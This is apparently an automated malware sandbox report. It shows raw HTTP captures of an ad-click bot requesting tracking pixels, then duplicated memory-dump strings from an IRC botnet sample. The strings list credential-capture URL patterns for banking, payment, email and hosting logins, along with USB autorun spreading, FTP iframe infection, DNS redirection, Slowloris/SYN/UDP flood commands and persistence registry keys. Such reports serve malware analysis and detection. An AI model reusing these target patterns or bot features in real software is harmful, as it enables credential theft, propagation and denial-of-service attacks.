Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=819
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:29 GMT
Connection: keep-alive
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT..ETag: 325472601571f31e1bf00674c368d335..Content-Length: 43..Accept-Ranges: bytes..X-Timestamp: 1363188507.50732..Content-Type: image/gif..X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1..Cache-Control: public, max-age=819..Expires: Mon, 21 Apr 2014 12:11:08 GMT..Date: Mon, 21 Apr 2014 11:57:29 GMT..Connection: keep-alive..GIF89a.............!.......,...........D..;....
GET /pixel.gif?id=5397210&r=0.14030898417391835&u=http://esmusicon.com/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=805
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:43 GMT
Connection: keep-alive
GIF89a.............!.......,...........D..;....
GET /pixel.gif?id=5397210&r=0.0038873341277975703&u=http://esmusicon.com/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=805
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:43 GMT
Connection: keep-alive
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT..ETag: 325472601571f31e1bf00674c368d335..Content-Length: 43..Accept-Ranges: bytes..X-Timestamp: 1363188507.50732..Content-Type: image/gif..X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1..Cache-Control: public, max-age=805..Expires: Mon, 21 Apr 2014 12:11:08 GMT..Date: Mon, 21 Apr 2014 11:57:43 GMT..Connection: keep-alive..GIF89a.............!.......,...........D..;..
GET /pixel.gif?id=5397210&r=0.7235460356268475&u=http://esmusicon.com/Poemas/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=819
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:29 GMT
Connection: keep-alive
GIF89a.............!.......,...........D..;....
GET /pixel.gif?id=5397210&r=0.8022853591730279&u=http://esmusicon.com/Poemas/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=819
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:29 GMT
Connection: keep-alive
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT..ETag: 325472601571f31e1bf00674c368d335..Content-Length: 43..Accept-Ranges: bytes..X-Timestamp: 1363188507.50732..Content-Type: image/gif..X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1..Cache-Control: public, max-age=819..Expires: Mon, 21 Apr 2014 12:11:08 GMT..Date: Mon, 21 Apr 2014 11:57:29 GMT..Connection: keep-alive..GIF89a.............!.......,...........D..;....
GET /pixel.gif?id=5397210&r=0.8917821187154981&u=http://esmusicon.com/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=805
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:43 GMT
Connection: keep-alive
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT..ETag: 325472601571f31e1bf00674c368d335..Content-Length: 43..Accept-Ranges: bytes..X-Timestamp: 1363188507.50732..Content-Type: image/gif..X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1..Cache-Control: public, max-age=805..Expires: Mon, 21 Apr 2014 12:11:08 GMT..Date: Mon, 21 Apr 2014 11:57:43 GMT..Connection: keep-alive..GIF89a.............!.......,...........D..;..
Map
Strings from Dumps
2.exe_1240:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
333333333333330
333333333333330
f00.PR
f00.PR
3333333330
3333333330
3333330
3333330
WebBrowser
WebBrowser
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
ieframe.dll
ieframe.dll
2C:\Windows\SysWOW64\ieframe.oca
2C:\Windows\SysWOW64\ieframe.oca
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
VBA6.DLL
VBA6.DLL
http:///
http:///
@*\AC:\Users\usuario\Desktop\a\nuevato\autoClick.vbp
@*\AC:\Users\usuario\Desktop\a\nuevato\autoClick.vbp
http://mi.2papa.us
http://mi.2papa.us
Cargando web:
Cargando web:
Web cargada
Web cargada
http://tutecnologia.info/ads.php
http://tutecnologia.info/ads.php
mi.2papa.exe
mi.2papa.exe
2.exe_1240_rwx_00150000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
c:\%original file name%.exe
c:\%original file name%.exe
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%Documents and Settings%\%current user%\Application Data\2.exe
%Documents and Settings%\%current user%\Application Data\2.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Documents and Settings\"%CurrentUserName%"\Application Data\2.exe
\Device\HarddiskVolume1\Documents and Settings\"%CurrentUserName%"\Application Data\2.exe
2.exe_1240_rwx_00400000_00019000:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
333333333333330
333333333333330
f00.PR
f00.PR
3333333330
3333333330
3333330
3333330
WebBrowser
WebBrowser
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
ieframe.dll
ieframe.dll
2C:\Windows\SysWOW64\ieframe.oca
2C:\Windows\SysWOW64\ieframe.oca
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
VBA6.DLL
VBA6.DLL
http:///
http:///
@*\AC:\Users\usuario\Desktop\a\nuevato\autoClick.vbp
@*\AC:\Users\usuario\Desktop\a\nuevato\autoClick.vbp
http://mi.2papa.us
http://mi.2papa.us
Cargando web:
Cargando web:
Web cargada
Web cargada
http://tutecnologia.info/ads.php
http://tutecnologia.info/ads.php
mi.2papa.exe
mi.2papa.exe
csrss.exe_688_rwx_02C60000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
